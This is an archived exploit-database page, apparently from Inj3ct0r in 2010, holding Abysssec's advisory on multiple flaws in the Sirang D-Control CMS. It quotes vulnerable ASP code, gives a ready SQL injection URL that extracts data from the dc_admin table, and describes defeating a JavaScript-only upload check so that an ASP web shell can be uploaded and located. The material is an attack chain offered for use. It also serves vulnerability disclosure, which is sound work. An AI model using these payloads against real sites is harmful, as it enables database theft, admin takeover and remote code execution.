Home / os / win7

[webapps / 0day] - Sirang Web-Based D-Control Multiple Remot

Posted on 07 September 2010

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>Sirang Web-Based D-Control Multiple Remote Vulnerabilities | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Exploit category: webapps / 0day | Exploit author: Abysssec' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></head><body><pre>========================================================== Sirang Web-Based D-Control Multiple Remote Vulnerabilities ========================================================== - Title : Sirang Web-Based D-Control Multiple Remote Vulnerabilities - Affected Version : &lt;= v6.0 - Vendor Site : http://www.sirang.com - Discovery : Abysssec.com Description : this CMS suffer from OWASP top 10 !!! some of there will come here ... Vulnerabilites : ====================================================================================================================== 1- SQL Injection Vulnerability is located in content.asp line 131-133 ... txt=&quot;select * from news where del=&#039;false&#039; and &quot;+keyfld+&quot;!=&#039;-&#039; order by id desc limit 1&quot; set rs=conn.execute(txt) while not rs.eof ... content.asp line 202-206 ... if id&lt;&gt;&quot;&quot; then txt10 =&quot;select * from &quot;+ cstr(tblname) +&quot; where del=&#039;false&#039; and id=&#039;&quot;+ id +&quot;&#039;&quot; set xx = conn.execute(txt10) if not xx.eof then ... lots of files those will have to do input validation from user input are vulnerable to SQL Injection . PoC : www.site.com/main_fa.asp?status=news&amp;newsID=23&#039;/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16/**/from/**/dc_admin/* note : if you can&#039;t see result you need to do it blindly ====================================================================================================================== 2- Bypass uploads restriction: after you got user/pass with sql injection go to http://site.com/admin/dc_upload.asp js file line 13-34 : function showthumb(file) { if (file !=&#039;&#039;) { myshowfile = file; extArray = new Array(&quot;.gif&quot;, &quot;.jpg&quot;, &quot;.png&quot;, &quot;.bmp&quot;, &quot;.jpe&quot;); allowSubmit = false; while (file.indexOf(&quot;\&quot;) != -1) file = file.slice(file.indexOf(&quot;\&quot;) + 1); ext = file.slice(file.indexOf(&quot;.&quot;)).toLowerCase(); for (var i = 0; i &lt; extArray.length; i++) { if (extArray[i] == ext) { allowSubmit = true; break; } } if (allowSubmit) thumb.src=myshowfile; else alert(&quot;Only files that end in types: &quot; + (extArray.join(&quot; &quot;)) + &quot; could be previewd.&quot;); } else { alert(&quot;Only files that end in types: &quot; + (extArray.join(&quot; &quot;)) + &quot; could be previewd.&quot;); } } as you can see the uploader will check malicious extention by javascript . just disable javascript and you can upload &quot;ASP&quot; shell. you can find your shell in : www.site.com/0_site_com/[rnd-number].asp (the application itself will show you right rnd number after upload) # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-09-07]</pre></body></html>

 

TOP